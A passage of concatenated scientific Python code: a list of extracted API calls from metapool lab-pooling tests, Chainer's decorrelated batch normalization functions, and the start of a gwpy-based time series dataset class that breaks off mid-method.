24]'}), '(vol_sample, max_vol_per_well=26,\n dest_plate_shape=[16, 24])\n', (20028, 20092), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((20332, 20381), 'numpy.array', 'np.array', (['[[10.0, 10.0, np.nan, 5.0, 10.0, 10.0]]'], {}), '([[10.0, 10.0, np.nan, 5.0, 10.0, 10.0]])\n', (20340, 20381), True, 'import numpy as np\n'), ((21057, 21150), 'metapool.metapool.format_pooling_echo_pick_list', 'format_pooling_echo_pick_list', (['vol_sample'], {'max_vol_per_well': '(26)', 'dest_plate_shape': '[16, 24]'}), '(vol_sample, max_vol_per_well=26,\n dest_plate_shape=[16, 24])\n', (21086, 21150), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((21375, 21448), 'pandas.DataFrame', 'pd.DataFrame', (["{'Cp': [12, 0, 5, np.nan], 'Pos': ['A1', 'A2', 'A3', 'A4']}"], {}), "({'Cp': [12, 0, 5, np.nan], 'Pos': ['A1', 'A2', 'A3', 'A4']})\n", (21387, 21448), True, 'import pandas as pd\n'), ((21513, 21549), 'numpy.array', 'np.array', (['[[12.0, 0.0, 5.0, np.nan]]'], {}), '([[12.0, 0.0, 5.0, np.nan]])\n', (21521, 21549), True, 'import numpy as np\n'), ((21703, 21822), 'pandas.DataFrame', 'pd.DataFrame', (["{'Cp': [12, 0, 1, np.nan, 12, 0, 5, np.nan], 'Pos': ['A1', 'A2', 'A3', 'A4',\n 'B1', 'B2', 'B3', 'B4']}"], {}), "({'Cp': [12, 0, 1, np.nan, 12, 0, 5, np.nan], 'Pos': ['A1',\n 'A2', 'A3', 'A4', 'B1', 'B2', 'B3', 'B4']})\n", (21715, 21822), True, 'import pandas as pd\n'), ((21981, 22043), 'numpy.array', 'np.array', (['[[12.0, 0.0, 1.0, np.nan], [12.0, 0.0, 5.0, np.nan]]'], {}), '([[12.0, 0.0, 1.0, np.nan], [12.0, 0.0, 5.0, np.nan]])\n', (21989, 22043), True, 'import numpy as np\n'), ((24834, 24905), 'metapool.metapool.combine_dfs', 'combine_dfs', (['test_qpcr_df', 'test_dna_picklist_df', 'test_index_picklist_df'], {}), '(test_qpcr_df, test_dna_picklist_df, test_index_picklist_df)\n', (24845, 24905), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((24928, 24995), 'pandas.testing.assert_frame_equal', 'pd.testing.assert_frame_equal', (['combined_df', 'exp_df'], {'check_like': '(True)'}), '(combined_df, exp_df, check_like=True)\n', (24957, 24995), True, 'import pandas as pd\n'), ((26373, 26410), 'metapool.metapool.add_dna_conc', 'add_dna_conc', (['test_in_df', 'test_dna_df'], {}), '(test_in_df, test_dna_df)\n', (26385, 26410), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((26420, 26482), 'pandas.testing.assert_frame_equal', 'pd.testing.assert_frame_equal', (['obs_df', 'exp_df'], {'check_like': '(True)'}), '(obs_df, exp_df, check_like=True)\n', (26449, 26482), True, 'import pandas as pd\n'), ((26545, 26586), 'metapool.metapool.compute_pico_concentration', 'compute_pico_concentration', (['self.dna_vals'], {}), '(self.dna_vals)\n', (26571, 26586), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((26625, 26654), 'numpy.testing.assert_allclose', 'npt.assert_allclose', (['obs', 'exp'], {}), '(obs, exp)\n', (26644, 26654), True, 'import numpy.testing as npt\n'), ((27094, 27134), 'metapool.metapool.sequencer_i5_index', 'sequencer_i5_index', (['"""HiSeq4000"""', 'indices'], {}), "('HiSeq4000', indices)\n", (27112, 27134), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((27158, 27198), 'metapool.metapool.sequencer_i5_index', 'sequencer_i5_index', (['"""HiSeq2500"""', 'indices'], {}), "('HiSeq2500', indices)\n", (27176, 27198), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((27221, 27259), 'metapool.metapool.sequencer_i5_index', 'sequencer_i5_index', (['"""NextSeq"""', 'indices'], {}), "('NextSeq', indices)\n", (27239, 27259), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((27912, 27950), 'metapool.metapool.reformat_interleaved_to_columns', 'reformat_interleaved_to_columns', (['wells'], {}), '(wells)\n', (27943, 27950), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((27960, 27999), 'numpy.testing.assert_array_equal', 'np.testing.assert_array_equal', (['exp', 'obs'], {}), '(exp, obs)\n', (27989, 27999), True, 'import numpy as np\n'), ((4996, 5027), 'metapool.metapool.read_plate_map_csv', 'read_plate_map_csv', (['plate_map_f'], {}), '(plate_map_f)\n', (5014, 5027), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((5507, 5538), 'metapool.metapool.read_plate_map_csv', 'read_plate_map_csv', (['plate_map_f'], {}), '(plate_map_f)\n', (5525, 5538), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((7291, 7316), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (7306, 7316), False, 'import os\n'), ((7770, 7818), 'metapool.metapool.read_pico_csv', 'read_pico_csv', (['fp_spectramax'], {'plate_reader': '"""foo"""'}), "(fp_spectramax, plate_reader='foo')\n", (7783, 7818), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((17529, 17545), 'numpy.zeros', 'np.zeros', (['[3, 4]'], {}), '([3, 4])\n', (17537, 17545), True, 'import numpy as np\n'), ((17872, 17888), 'numpy.zeros', 'np.zeros', (['[3, 4]'], {}), '([3, 4])\n', (17880, 17888), True, 'import numpy as np\n'), ((24502, 24533), 'io.StringIO', 'StringIO', (['test_index_picklist_f'], {}), '(test_index_picklist_f)\n', (24510, 24533), False, 'from io import StringIO\n'), ((24611, 24640), 'io.StringIO', 'StringIO', (['test_dna_picklist_f'], {}), '(test_dna_picklist_f)\n', (24619, 24640), False, 'from io import StringIO\n'), ((24697, 24718), 'io.StringIO', 'StringIO', (['test_qpcr_f'], {}), '(test_qpcr_f)\n', (24705, 24718), False, 'from io import StringIO\n'), ((24770, 24789), 'io.StringIO', 'StringIO', (['exp_out_f'], {}), '(exp_out_f)\n', (24778, 24789), False, 'from io import StringIO\n'), ((26159, 26181), 'io.StringIO', 'StringIO', (['test_exp_out'], {}), '(test_exp_out)\n', (26167, 26181), False, 'from io import StringIO\n'), ((26236, 26259), 'io.StringIO', 'StringIO', (['test_combined'], {}), '(test_combined)\n', (26244, 26259), False, 'from io import StringIO\n'), ((26315, 26333), 'io.StringIO', 'StringIO', (['test_dna'], {}), '(test_dna)\n', (26323, 26333), False, 'from io import StringIO\n'), ((26726, 26750), 'metapool.metapool.bcl_scrub_name', 'bcl_scrub_name', (['"""test.1"""'], {}), "('test.1')\n", (26740, 26750), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((26787, 26811), 'metapool.metapool.bcl_scrub_name', 'bcl_scrub_name', (['"""test-1"""'], {}), "('test-1')\n", (26801, 26811), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((26848, 26872), 'metapool.metapool.bcl_scrub_name', 'bcl_scrub_name', (['"""test_1"""'], {}), "('test_1')\n", (26862, 26872), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((26923, 26934), 'metapool.metapool.rc', 'rc', (['"""AGCCT"""'], {}), "('AGCCT')\n", (26925, 26934), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((27470, 27504), 'metapool.metapool.sequencer_i5_index', 'sequencer_i5_index', (['"""foo"""', 'indices'], {}), "('foo', indices)\n", (27488, 27504), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((21586, 21632), 'metapool.metapool.make_2D_array', 'make_2D_array', (['example_qpcr_df'], {'rows': '(1)', 'cols': '(4)'}), '(example_qpcr_df, rows=1, cols=4)\n', (21599, 21632), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((22114, 22161), 'metapool.metapool.make_2D_array', 'make_2D_array', (['example2_qpcr_df'], {'rows': '(2)', 'cols': '(4)'}), '(example2_qpcr_df, rows=2, cols=4)\n', (22127, 22161), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n')] |
import numpy
from chainer import backend
from chainer import function_node
from chainer.utils import argument
from chainer.utils import type_check
# {numpy: True, cupy: False}
_xp_supports_batch_eigh = {}
# routines for batched matrices
def _eigh(a, xp):
if xp not in _xp_supports_batch_eigh:
try:
xp.linalg.eigh(xp.ones((2, 2, 2), xp.float32))
except ValueError:
_xp_supports_batch_eigh[xp] = False
else:
_xp_supports_batch_eigh[xp] = True
if _xp_supports_batch_eigh[xp]:
return xp.linalg.eigh(a)
ws = []
vs = []
for ai in a:
w, v = xp.linalg.eigh(ai)
ws.append(w)
vs.append(v)
return xp.stack(ws), xp.stack(vs)
def _matmul(a, b, xp):
if hasattr(xp, 'matmul'): # numpy.matmul is supported from version 1.10.0
return xp.matmul(a, b)
else:
return xp.einsum('bij,bjk->bik', a, b)
def _diag(a, xp):
s0, s1 = a.shape
ret = xp.zeros((s0, s1, s1), a.dtype)
arange_s1 = numpy.arange(s1)
ret[:, arange_s1, arange_s1] = a
return ret
def _calc_axis_and_m(x_shape, batch_size):
m = batch_size
spatial_ndim = len(x_shape) - 2
spatial_axis = tuple(range(2, 2 + spatial_ndim))
for i in spatial_axis:
m *= x_shape[i]
return spatial_axis, m
class DecorrelatedBatchNormalization(function_node.FunctionNode):
def __init__(self, groups=16, eps=2e-5, mean=None, projection=None,
decay=0.9):
self.groups = groups
self.running_mean = mean
self.running_projection = projection
self.eps = eps
self.decay = decay
self.axis = None
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 1)
x_type = in_types[0]
type_check.expect(
x_type.dtype.kind == 'f',
x_type.shape[1] % self.groups == 0,
)
type_check.expect(
x_type.ndim >= 2,
)
def forward(self, inputs):
self.retain_inputs(())
x = inputs[0]
xp = backend.get_array_module(x)
x_shape = x.shape
b, c = x_shape[:2]
g = self.groups
C = c // g
spatial_axis, m = _calc_axis_and_m(x_shape, b)
# (g, C, m)
x_hat = x.transpose((1, 0) + spatial_axis).reshape(g, C, m)
mean = x_hat.mean(axis=2, keepdims=True)
x_hat = x_hat - mean
self.eps = x.dtype.type(self.eps)
eps_matrix = self.eps * xp.eye(C, dtype=x.dtype)
cov = _matmul(
x_hat, x_hat.transpose(0, 2, 1),
xp) / x.dtype.type(m) + eps_matrix
# (g, C), (g, C, C)
self.eigvals, self.eigvectors = _eigh(cov, xp)
U = _matmul(
_diag(self.eigvals ** -0.5, xp),
self.eigvectors.transpose(0, 2, 1),
xp)
self.y_hat_pca = _matmul(U, x_hat, xp) # PCA whitening
# ZCA whitening
y_hat = _matmul(self.eigvectors, self.y_hat_pca, xp)
y = y_hat.reshape((c, b) + x_shape[2:]).transpose(
(1, 0) + spatial_axis)
# Update running statistics
if self.running_mean is not None:
mean = mean.squeeze(axis=2)
self.running_mean *= self.decay
self.running_mean += (1 - self.decay) * mean
if self.running_projection is not None:
adjust = m / max(m - 1., 1.) # unbiased estimation
self.running_projection *= self.decay
projection = _matmul(self.eigvectors, U, xp)
self.running_projection += (1 - self.decay) * adjust * projection
return y,
def backward(self, indexes, grad_outputs):
gy, = grad_outputs
f = DecorrelatedBatchNormalizationGrad(
self.groups, self.eigvals, self.eigvectors, self.y_hat_pca)
return f.apply((gy,))
class DecorrelatedBatchNormalizationGrad(function_node.FunctionNode):
def __init__(self, groups, eigvals, eigvectors, y_hat_pca):
self.groups = groups
self.eigvals = eigvals
self.eigvectors = eigvectors
self.y_hat_pca = y_hat_pca
def forward(self, inputs):
self.retain_inputs(())
gy = inputs[0]
xp = backend.get_array_module(gy)
gy_shape = gy.shape
b, c = gy_shape[:2]
g = self.groups
C = c // g
spatial_axis, m = _calc_axis_and_m(gy_shape, b)
arange_C = numpy.arange(C)
diag_indices = slice(None), arange_C, arange_C
gy_hat = gy.transpose((1, 0) + spatial_axis).reshape(g, C, m)
eigvectors = self.eigvectors
eigvals = self.eigvals
y_hat_pca = self.y_hat_pca
gy_hat_pca = _matmul(eigvectors.transpose(0, 2, 1), gy_hat, xp)
f = gy_hat_pca.mean(axis=2, keepdims=True)
K = eigvals[:, :, None] - eigvals[:, None, :]
valid = K != 0 # to avoid nan, use eig_i != eig_j instead of i != j
K[valid] = xp.reciprocal(K[valid])
V = _diag(eigvals, xp)
V_sqrt = _diag(eigvals ** 0.5, xp)
V_invsqrt = _diag(eigvals ** -0.5, xp)
F_c = _matmul(
gy_hat_pca, y_hat_pca.transpose(0, 2, 1),
xp) / gy.dtype.type(m)
M = xp.zeros_like(F_c)
M[diag_indices] = F_c[diag_indices]
mat = K.transpose(0, 2, 1) * (
_matmul(V, F_c.transpose(0, 2, 1), xp)
+ _matmul(_matmul(V_sqrt, F_c, xp), V_sqrt, xp)
)
S = mat + mat.transpose(0, 2, 1)
R = gy_hat_pca - f + _matmul(
(S - M).transpose(0, 2, 1), y_hat_pca, xp)
gx_hat = _matmul(
_matmul(R.transpose(0, 2, 1), V_invsqrt, xp),
eigvectors.transpose(0, 2, 1), xp
).transpose(0, 2, 1)
gx = gx_hat.reshape((c, b) + gy_shape[2:]).transpose(
(1, 0) + spatial_axis)
self.retain_outputs(())
return gx,
def backward(self, inputs, grad_outputs):
# TODO(crcrpar): Implement this.
raise NotImplementedError('Double backward is not implemented for'
' decorrelated batch normalization.')
class FixedDecorrelatedBatchNormalization(function_node.FunctionNode):
def __init__(self, groups):
self.groups = groups
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 3)
x_type, mean_type, var_type = in_types
type_check.expect(
x_type.dtype.kind == 'f',
mean_type.dtype == x_type.dtype,
var_type.dtype == x_type.dtype,
)
type_check.expect(
x_type.ndim >= 2,
)
def forward(self, inputs):
self.retain_inputs((0, 1, 2))
x, mean, projection = inputs
xp = backend.get_array_module(x)
x_shape = x.shape
b, c = x_shape[:2]
g = self.groups
C = c // g
spatial_axis, m = _calc_axis_and_m(x_shape, b)
x_hat = x.transpose((1, 0) + spatial_axis).reshape(g, C, m)
x_hat = x_hat - xp.expand_dims(mean, axis=2)
y_hat = _matmul(projection, x_hat, xp)
y = y_hat.reshape((c, b) + x_shape[2:]).transpose(
(1, 0) + spatial_axis)
return y,
def backward(self, indexes, grad_outputs):
x, mean, projection = self.get_retained_inputs()
gy, = grad_outputs
f = FixedDecorrelatedBatchNormalizationGrad(self.groups)
return f.apply((x, mean, projection, gy))
class FixedDecorrelatedBatchNormalizationGrad(function_node.FunctionNode):
def __init__(self, groups):
self.groups = groups
def forward(self, inputs):
self.retain_inputs(())
x, mean, projection, gy = inputs
xp = backend.get_array_module(x)
gy_shape = gy.shape
b, c = gy_shape[:2]
g = self.groups
C = c // g
spatial_axis, m = _calc_axis_and_m(gy_shape, b)
gy_hat = gy.transpose((1, 0) + spatial_axis).reshape(g, C, m)
x_hat = x.transpose((1, 0) + spatial_axis).reshape(g, C, m)
gy_hat_pca = _matmul(projection.transpose(0, 2, 1), gy_hat, xp)
gx = gy_hat_pca.reshape((c, b) + gy_shape[2:]).transpose(
(1, 0) + spatial_axis)
rhs = x_hat - xp.expand_dims(mean, axis=2)
gprojection = _matmul((x_hat - rhs).transpose(0, 2, 1), gy_hat, xp)
gmean = -gy_hat_pca[..., 0]
self.retain_outputs(())
return gx, gmean, gprojection
def backward(self, inputs, grad_outputs):
# TODO(crcrpar): Implement this.
raise NotImplementedError('Double backward is not implemented for'
' fixed decorrelated batch normalization.')
def decorrelated_batch_normalization(x, **kwargs):
"""decorrelated_batch_normalization(x, *, groups=16, eps=2e-5, \
running_mean=None, running_projection=None, decay=0.9)
Decorrelated batch normalization function.
It takes the input variable ``x`` and normalizes it using
batch statistics to make the output zero-mean and decorrelated.
Args:
x (:class:`~chainer.Variable`): Input variable.
groups (int): Number of groups to use for group whitening.
eps (float): Epsilon value for numerical stability.
running_mean (:ref:`ndarray`): Expected value of the mean. This is a
running average of the mean over several mini-batches using
the decay parameter. If ``None``, the expected mean is initialized
to zero.
running_projection (:ref:`ndarray`):
Expected value of the project matrix. This is a
running average of the projection over several mini-batches using
the decay parameter. If ``None``, the expected projected is
initialized to the identity matrix.
decay (float): Decay rate of moving average. It is used during
training.
Returns:
~chainer.Variable: The output variable which has the same shape as
:math:`x`.
See: `Decorrelated Batch Normalization <https://arxiv.org/abs/1804.08450>`_
.. seealso:: :class:`~chainer.links.DecorrelatedBatchNormalization`
"""
groups, eps, running_mean, running_projection, decay = \
argument.parse_kwargs(
kwargs, ('groups', 16), ('eps', 2e-5), ('running_mean', None),
('running_projection', None), ('decay', 0.9))
f = DecorrelatedBatchNormalization(
groups, eps, running_mean, running_projection, decay)
return f.apply((x,))[0]
def fixed_decorrelated_batch_normalization(x, mean, projection, groups=16):
"""Decorrelated batch normalization function with fixed statistics.
This is a variant of decorrelated batch normalization, where the mean and
projection statistics are given by the caller as fixed variables. This is
used in testing mode of the decorrelated batch normalization layer, where
batch statistics cannot be used for prediction consistency.
Args:
x (:class:`~chainer.Variable`): Input variable.
mean (:class:`~chainer.Variable` or :ref:`ndarray`):
Shifting parameter of input.
projection (:class:`~chainer.Variable` or :ref:`ndarray`):
Projection matrix for decorrelation of input.
groups (int): Number of groups to use for group whitening.
Returns:
~chainer.Variable: The output variable which has the same shape as
:math:`x`.
.. seealso::
:func:`~chainer.functions.decorrelated_batch_normalization`,
:class:`~chainer.links.DecorrelatedBatchNormalization`
"""
f = FixedDecorrelatedBatchNormalization(groups)
return f.apply((x, mean, projection))[0]
| [
"chainer.utils.argument.parse_kwargs",
"numpy.arange",
"chainer.backend.get_array_module",
"chainer.utils.type_check.expect"
] | [((1025, 1041), 'numpy.arange', 'numpy.arange', (['s1'], {}), '(s1)\n', (1037, 1041), False, 'import numpy\n'), ((10230, 10366), 'chainer.utils.argument.parse_kwargs', 'argument.parse_kwargs', (['kwargs', "('groups', 16)", "('eps', 2e-05)", "('running_mean', None)", "('running_projection', None)", "('decay', 0.9)"], {}), "(kwargs, ('groups', 16), ('eps', 2e-05), (\n 'running_mean', None), ('running_projection', None), ('decay', 0.9))\n", (10251, 10366), False, 'from chainer.utils import argument\n'), ((1809, 1888), 'chainer.utils.type_check.expect', 'type_check.expect', (["(x_type.dtype.kind == 'f')", '(x_type.shape[1] % self.groups == 0)'], {}), "(x_type.dtype.kind == 'f', x_type.shape[1] % self.groups == 0)\n", (1826, 1888), False, 'from chainer.utils import type_check\n'), ((1932, 1967), 'chainer.utils.type_check.expect', 'type_check.expect', (['(x_type.ndim >= 2)'], {}), '(x_type.ndim >= 2)\n', (1949, 1967), False, 'from chainer.utils import type_check\n'), ((2089, 2116), 'chainer.backend.get_array_module', 'backend.get_array_module', (['x'], {}), '(x)\n', (2113, 2116), False, 'from chainer import backend\n'), ((4237, 4265), 'chainer.backend.get_array_module', 'backend.get_array_module', (['gy'], {}), '(gy)\n', (4261, 4265), False, 'from chainer import backend\n'), ((4440, 4455), 'numpy.arange', 'numpy.arange', (['C'], {}), '(C)\n', (4452, 4455), False, 'import numpy\n'), ((6416, 6528), 'chainer.utils.type_check.expect', 'type_check.expect', (["(x_type.dtype.kind == 'f')", '(mean_type.dtype == x_type.dtype)', '(var_type.dtype == x_type.dtype)'], {}), "(x_type.dtype.kind == 'f', mean_type.dtype == x_type.dtype,\n var_type.dtype == x_type.dtype)\n", (6433, 6528), False, 'from chainer.utils import type_check\n'), ((6580, 6615), 'chainer.utils.type_check.expect', 'type_check.expect', (['(x_type.ndim >= 2)'], {}), '(x_type.ndim >= 2)\n', (6597, 6615), False, 'from chainer.utils import type_check\n'), ((6759, 6786), 'chainer.backend.get_array_module', 'backend.get_array_module', (['x'], {}), '(x)\n', (6783, 6786), False, 'from chainer import backend\n'), ((7726, 7753), 'chainer.backend.get_array_module', 'backend.get_array_module', (['x'], {}), '(x)\n', (7750, 7753), False, 'from chainer import backend\n')] |
import h5py
import copy
from collections import OrderedDict
import numpy as np
import torch
from gwpy.timeseries import TimeSeries, TimeSeriesDict
from .signal import bandpass
class TimeSeriesDataset:
""" Torch dataset in timeseries format """
def __init__(self):
""" Initialized attributes """
self.data = []
self.channels = []
self.t0 = 0.
self.fs = 1.
self.target_idx = None
def fetch(self, channels, t0, duration, fs, nproc=4):
""" Fetch data """
# if channels is a file
if isinstance(channels, str):
channels = open(channels).read().splitlines()
target_channel = channels[0]
channels, fake_chans = self.categorize_channels (channels)
# get data and resample
data = TimeSeriesDict.get(channels, t0, t0 + duration, nproc=nproc,
allow_tape=True)
data = self.add_fake_sinusoids (data, fake_chans, t0, duration, fs )
data = data.resample(fs)
# sorted by channel name
data = OrderedDict(sorted(data.items()))
# reset attributes
self.data = []
self.channels = []
for chan, ts in data.items():
self.data.append(ts.value)
self.channels.append(chan)
self.data = np.stack(self.data)
self.channels = np.stack(self.channels)
self.t0 = t0
self.fs = fs
self.target_idx = np.where(self.channels == target_channel)[0][0]
def categorize_channels (self, channels):
real_chans = []
fake_chans = []
for i in range(len(channels)):
channel = channels[i]
if 'FAKE_SINE_FREQ' in channel:
fake_chans.append(channel)
else:
if channel != '':
real_chans.append(channel)
return real_chans, fake_chans
def add_fake_sinusoids (self, data, fake_chans, t0, duration, fs ):
""" The dict 'data' is modified with fake timeseries """
for chan in fake_chans:
f0 = float(chan.split('_')[-1].split('HZ')[0].replace('POINT', '.'))
time = np.linspace(t0, t0 + duration, int(duration*fs))
sine_2pi_ft = np.sin(2*np.pi*f0*time)
fake_ts = TimeSeries(sine_2pi_ft, t0=t0, sample_rate=fs, name=chan, unit="ct", channel=chan)
data[chan] = fake_ts
return data
def read(self, fname, channels, group=None):
""" Read data from HDF5 format """
# if channels is a file
if isinstance(channels, str):
channels = open(channels).read().splitlines()
target_channel = channels[0]
# read data from HDF5 file
self.data = []
self.channels = []
with h5py.File(fname, 'r') as f:
if group is not None:
fobj = f[group]
else:
fobj = f
for chan, data in fobj.items():
if chan not in channels:
continue
self.channels.append(chan)
self.data.append(data[:])
self.t0 = data.attrs['t0']
self.fs = data.attrs['sample_rate']
self.data = np.stack(self.data)
self.channels = np.stack(self.channels)
# sorted by channel name
sorted_indices = np.argsort(self.channels)
